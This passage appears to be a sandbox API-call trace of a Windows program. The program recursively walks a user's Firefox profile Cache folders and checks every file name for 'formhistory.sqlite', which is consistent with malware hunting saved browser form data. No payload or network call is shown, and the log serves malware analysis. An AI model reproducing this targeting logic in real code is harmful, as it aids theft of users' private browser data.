lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\59") returned 84 [0591.136] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.137] lstrlenW (lpString="DD6B0d01") returned 8 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\2\\59\\") returned 85 [0591.137] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee1260 [0591.137] LocalFree (hMem=0x2edc700) returned 0x0 [0591.137] StrStrIW (lpFirst="DD6B0d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.137] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.137] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.137] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.137] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.137] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.137] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.137] LocalFree (hMem=0x2edc358) returned 0x0 [0591.137] LocalFree (hMem=0x2edc490) returned 0x0 [0591.137] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.137] lstrcmpiW (lpString1="3", lpString2=".") returned 1 [0591.137] lstrcmpiW (lpString1="3", lpString2="..") returned 1 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.137] lstrlenW (lpString="\\") returned 1 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.137] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc490 [0591.137] lstrlenW (lpString="3") returned 1 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.137] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc358 [0591.137] LocalFree (hMem=0x2edc490) returned 0x0 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3") returned 81 [0591.137] lstrlenW (lpString="\\*.*") returned 4 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3") returned 81 [0591.137] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc490 [0591.137] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.137] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.137] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.137] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.137] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.137] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.137] lstrcmpiW (lpString1="DA", lpString2=".") returned 1 [0591.137] lstrcmpiW (lpString1="DA", lpString2="..") returned 1 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3") returned 81 [0591.137] lstrlenW (lpString="\\") returned 1 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3") returned 81 [0591.137] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.137] lstrlenW (lpString="DA") returned 2 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3\\") returned 82 [0591.137] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.137] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3\\DA") returned 84 [0591.137] lstrlenW (lpString="\\*.*") returned 4 [0591.137] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3\\DA") returned 84 [0591.138] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.138] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3\\DA\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.138] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.138] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.138] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.138] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.138] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.138] lstrlenW (lpString="\\") returned 1 [0591.138] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3\\DA") returned 84 [0591.138] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.138] lstrlenW (lpString="2555Ed01") returned 8 [0591.138] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\3\\DA\\") returned 85 [0591.138] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee13a8 [0591.138] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.138] StrStrIW (lpFirst="2555Ed01", lpSrch="formhistory.sqlite") returned 0x0 [0591.138] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.138] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.138] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.138] LocalFree (hMem=0x2edc700) returned 0x0 [0591.138] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.138] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.138] LocalFree (hMem=0x2edc490) returned 0x0 [0591.138] LocalFree (hMem=0x2edc358) returned 0x0 [0591.138] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.138] lstrcmpiW (lpString1="4", lpString2=".") returned 1 [0591.139] lstrcmpiW (lpString1="4", lpString2="..") returned 1 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.139] lstrlenW (lpString="\\") returned 1 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.139] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc358 [0591.139] lstrlenW (lpString="4") returned 1 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.139] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc490 [0591.139] LocalFree (hMem=0x2edc358) returned 0x0 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4") returned 81 [0591.139] lstrlenW (lpString="\\*.*") returned 4 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4") returned 81 [0591.139] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc358 [0591.139] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.139] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.139] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.139] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.139] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.139] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.139] lstrcmpiW (lpString1="EE", lpString2=".") returned 1 [0591.139] lstrcmpiW (lpString1="EE", lpString2="..") returned 1 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4") returned 81 [0591.139] lstrlenW (lpString="\\") returned 1 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4") returned 81 [0591.139] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.139] lstrlenW (lpString="EE") returned 2 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4\\") returned 82 [0591.139] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.139] LocalFree (hMem=0x2edc700) returned 0x0 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4\\EE") returned 84 [0591.139] lstrlenW (lpString="\\*.*") returned 4 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4\\EE") returned 84 [0591.139] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.139] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4\\EE\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.139] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.139] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.139] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.139] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.139] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.139] lstrlenW (lpString="\\") returned 1 [0591.139] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4\\EE") returned 84 [0591.140] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.140] lstrlenW (lpString="95599d01") returned 8 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\4\\EE\\") returned 85 [0591.140] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee14f0 [0591.140] LocalFree (hMem=0x2edc700) returned 0x0 [0591.140] StrStrIW (lpFirst="95599d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.140] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.140] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.140] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.140] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.140] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.140] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.140] LocalFree (hMem=0x2edc358) returned 0x0 [0591.140] LocalFree (hMem=0x2edc490) returned 0x0 [0591.140] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.140] lstrcmpiW (lpString1="5", lpString2=".") returned 1 [0591.140] lstrcmpiW (lpString1="5", lpString2="..") returned 1 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.140] lstrlenW (lpString="\\") returned 1 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.140] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc490 [0591.140] lstrlenW (lpString="5") returned 1 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.140] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc358 [0591.140] LocalFree (hMem=0x2edc490) returned 0x0 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5") returned 81 [0591.140] lstrlenW (lpString="\\*.*") returned 4 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5") returned 81 [0591.140] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc490 [0591.140] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.140] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.140] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.140] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.140] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.140] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.140] lstrcmpiW (lpString1="1B", lpString2=".") returned 1 [0591.140] lstrcmpiW (lpString1="1B", lpString2="..") returned 1 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5") returned 81 [0591.140] lstrlenW (lpString="\\") returned 1 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5") returned 81 [0591.140] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.140] lstrlenW (lpString="1B") returned 2 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\") returned 82 [0591.140] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.140] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.140] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\1B") returned 84 [0591.140] lstrlenW (lpString="\\*.*") returned 4 [0591.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\1B") returned 84 [0591.141] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.141] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\1B\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.141] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.141] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.141] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.141] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.141] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.141] lstrlenW (lpString="\\") returned 1 [0591.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\1B") returned 84 [0591.141] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.141] lstrlenW (lpString="2561Dd01") returned 8 [0591.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\1B\\") returned 85 [0591.141] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4030 [0591.141] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.141] StrStrIW (lpFirst="2561Dd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.141] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.141] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.141] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.141] LocalFree (hMem=0x2edc700) returned 0x0 [0591.141] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.141] lstrcmpiW (lpString1="9A", lpString2=".") returned 1 [0591.141] lstrcmpiW (lpString1="9A", lpString2="..") returned 1 [0591.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5") returned 81 [0591.141] lstrlenW (lpString="\\") returned 1 [0591.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5") returned 81 [0591.141] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc700 [0591.141] lstrlenW (lpString="9A") returned 2 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\") returned 82 [0591.142] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc5c8 [0591.142] LocalFree (hMem=0x2edc700) returned 0x0 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\9A") returned 84 [0591.142] lstrlenW (lpString="\\*.*") returned 4 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\9A") returned 84 [0591.142] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.142] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\9A\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.142] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.142] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.142] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.142] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.142] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.142] lstrlenW (lpString="\\") returned 1 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\9A") returned 84 [0591.142] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc700 [0591.142] lstrlenW (lpString="28159d01") returned 8 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\9A\\") returned 85 [0591.142] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee4178 [0591.142] LocalFree (hMem=0x2edc700) returned 0x0 [0591.142] StrStrIW (lpFirst="28159d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.142] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.142] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.142] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.142] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.142] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.142] lstrcmpiW (lpString1="F1", lpString2=".") returned 1 [0591.142] lstrcmpiW (lpString1="F1", lpString2="..") returned 1 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5") returned 81 [0591.142] lstrlenW (lpString="\\") returned 1 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5") returned 81 [0591.142] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edc5c8 [0591.142] lstrlenW (lpString="F1") returned 2 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\") returned 82 [0591.142] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edc700 [0591.142] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\F1") returned 84 [0591.142] lstrlenW (lpString="\\*.*") returned 4 [0591.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\F1") returned 84 [0591.142] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ee0590 [0591.142] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\F1\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.143] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.143] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.143] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.143] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.143] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.143] lstrlenW (lpString="\\") returned 1 [0591.143] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\F1") returned 84 [0591.143] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc5c8 [0591.143] lstrlenW (lpString="C8C27d01") returned 8 [0591.143] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\5\\F1\\") returned 85 [0591.143] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ee42c0 [0591.143] LocalFree (hMem=0x2edc5c8) returned 0x0 [0591.143] StrStrIW (lpFirst="C8C27d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.143] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.143] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.143] LocalFree (hMem=0x2ee0590) returned 0x0 [0591.143] LocalFree (hMem=0x2edc700) returned 0x0 [0591.143] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.143] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.143] LocalFree (hMem=0x2edc490) returned 0x0 [0591.143] LocalFree (hMem=0x2edc358) returned 0x0 [0591.143] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.143] lstrcmpiW (lpString1="6", lpString2=".") returned 1 [0591.143] lstrcmpiW (lpString1="6", lpString2="..") returned 1 [0591.143] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.143] lstrlenW (lpString="\\") returned 1 [0591.143] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.143] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc358 [0591.143] lstrlenW (lpString="6") returned 1 [0591.143] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\") returned 80 [0591.143] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x2edc490 [0591.143] LocalFree (hMem=0x2edc358) returned 0x0 [0591.143] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\6") returned 81 [0591.144] lstrlenW (lpString="\\*.*") returned 4 [0591.144] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\6") returned 81 [0591.144] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edc358 [0591.144] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\6\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.144] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.144] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.144] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.144] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.144] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0591.144] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.144] LocalFree (hMem=0x2edc358) returned 0x0 [0591.144] LocalFree (hMem=0x2edc490) returned 0x0 [0591.144] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0591.144] lstrcmpiW (lpString1="7", lpString2=".") returned 1 [0591.144] lstrcmpiW (lpString1="7", lpString2="..") returned 1 [0591.144] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.144] lstrlenW (lpString="\\") returned 1 [0591.144] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.144] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x2edc490 [0591.144] lstrlenW 